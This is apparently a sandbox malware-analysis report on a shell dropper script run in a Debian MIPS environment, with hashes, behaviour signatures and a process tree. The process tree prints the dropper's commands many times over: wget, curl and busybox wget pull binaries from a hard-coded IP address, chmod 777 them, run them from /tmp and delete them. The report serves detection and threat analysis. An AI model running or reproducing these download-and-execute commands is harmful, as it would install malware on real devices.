Analysis
-
max time kernel
81s -
max time network
84s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
-
submitted
21-11-2024 08:15
General
-
Target
bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
-
Size
10KB
-
MD5
7f9d3db559611740d40b8bccb98f2049
-
SHA1
28310a0e460821cd5a5feac8b12caa9888a8d099
-
SHA256
bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb
-
SHA512
ece04554d410979552af51e89a048b680fa4deb2af109261066b0df055cd57a8c32e7600cc3e35f5b35a6795602775103c9ae7c4ad2cf54a8bc4e36a6eeca932
-
SSDEEP
192:WhV/N+6upNj0sUD8//x89a3lR9lC8gwS8gBhV/N+6KpNj0sL//x89an:6mpNj0sUDslR9M8gL8gbCpNj0sZ
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Reads runtime system information 28 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh1⤵
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
-
-
/bin/chmodchmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
- File and Directory Permissions Modification
-
-
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
- Executes dropped EXE
-
-
/bin/rmrm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
-
-
/bin/chmodchmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
- File and Directory Permissions Modification
-
-
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
- Executes dropped EXE
-
-
/bin/rmrm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
-
-
/bin/chmodchmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
- File and Directory Permissions Modification
-
-
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
- Executes dropped EXE
-
-
/bin/rmrm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
-
-
/bin/chmodchmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
- File and Directory Permissions Modification
-
-
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
- Executes dropped EXE
-
-
/bin/rmrm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
-
-
/bin/chmodchmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
- File and Directory Permissions Modification
-
-
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
- Executes dropped EXE
-
-
/bin/rmrm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
-
-
/bin/chmodchmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
- File and Directory Permissions Modification
-
-
/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
- Executes dropped EXE
-
-
/bin/rmrm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
-
-
/bin/chmodchmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
- File and Directory Permissions Modification
-
-
/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
- Executes dropped EXE
-
-
/bin/rmrm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
-
-
/bin/chmodchmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
- File and Directory Permissions Modification
-
-
/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
- Executes dropped EXE
-
-
/bin/rmrm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
-
-
/bin/chmodchmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
- File and Directory Permissions Modification
-
-
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
- Executes dropped EXE
-
-
/bin/rmrm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
-
-
/bin/chmodchmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
- File and Directory Permissions Modification
-
-
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
- Executes dropped EXE
-
-
/bin/rmrm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
-
-
/bin/chmodchmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
- File and Directory Permissions Modification
-
-
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
- Executes dropped EXE
-
-
/bin/rmrm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
-
-
/bin/chmodchmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
- File and Directory Permissions Modification
-
-
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
- Executes dropped EXE
-
-
/bin/rmrm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
-
-
/bin/chmodchmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
- File and Directory Permissions Modification
-
-
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
- Executes dropped EXE
-
-
/bin/rmrm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
-
-
/bin/chmodchmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
- File and Directory Permissions Modification
-
-
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
- Executes dropped EXE
-
-
/bin/rmrm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
-
-
/bin/chmodchmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
- File and Directory Permissions Modification
-
-
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
- Executes dropped EXE
-
-
/bin/rmrm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
-
-
/bin/chmodchmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
- File and Directory Permissions Modification
-
-
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
- Executes dropped EXE
-
-
/bin/rmrm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
-
-
/bin/chmodchmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
- File and Directory Permissions Modification
-
-
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
- Executes dropped EXE
-
-
/bin/rmrm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
-
-
/bin/chmodchmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
- File and Directory Permissions Modification
-
-
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
- Executes dropped EXE
-
-
/bin/rmrm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
-
-
/bin/chmodchmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
- File and Directory Permissions Modification
-
-
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
- Executes dropped EXE
-
-
/bin/rmrm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
-
-
/bin/chmodchmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
- File and Directory Permissions Modification
-
-
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
- Executes dropped EXE
-
-
/bin/rmrm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S52⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
-
-
/bin/chmodchmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
- File and Directory Permissions Modification
-
-
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
- Executes dropped EXE
-
-
/bin/rmrm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
-
-
/bin/chmodchmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
- File and Directory Permissions Modification
-
-
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
- Executes dropped EXE
-
-
/bin/rmrm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
-
-
/bin/chmodchmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
- File and Directory Permissions Modification
-
-
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
- Executes dropped EXE
-
-
/bin/rmrm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
-
-
/bin/chmodchmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
- File and Directory Permissions Modification
-
-
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
- Executes dropped EXE
-
-
/bin/rmrm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI72⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
-
-
/bin/chmodchmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
- File and Directory Permissions Modification
-
-
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
- Executes dropped EXE
-
-
/bin/rmrm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
-
-
/bin/chmodchmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
- File and Directory Permissions Modification
-
-
/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
- Executes dropped EXE
-
-
/bin/rmrm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
-
-
/bin/chmodchmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
- File and Directory Permissions Modification
-
-
/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
- Executes dropped EXE
-
-
/bin/rmrm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
-
-
/bin/chmodchmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
- File and Directory Permissions Modification
-
-
/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
- Executes dropped EXE
-
-
/bin/rmrm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97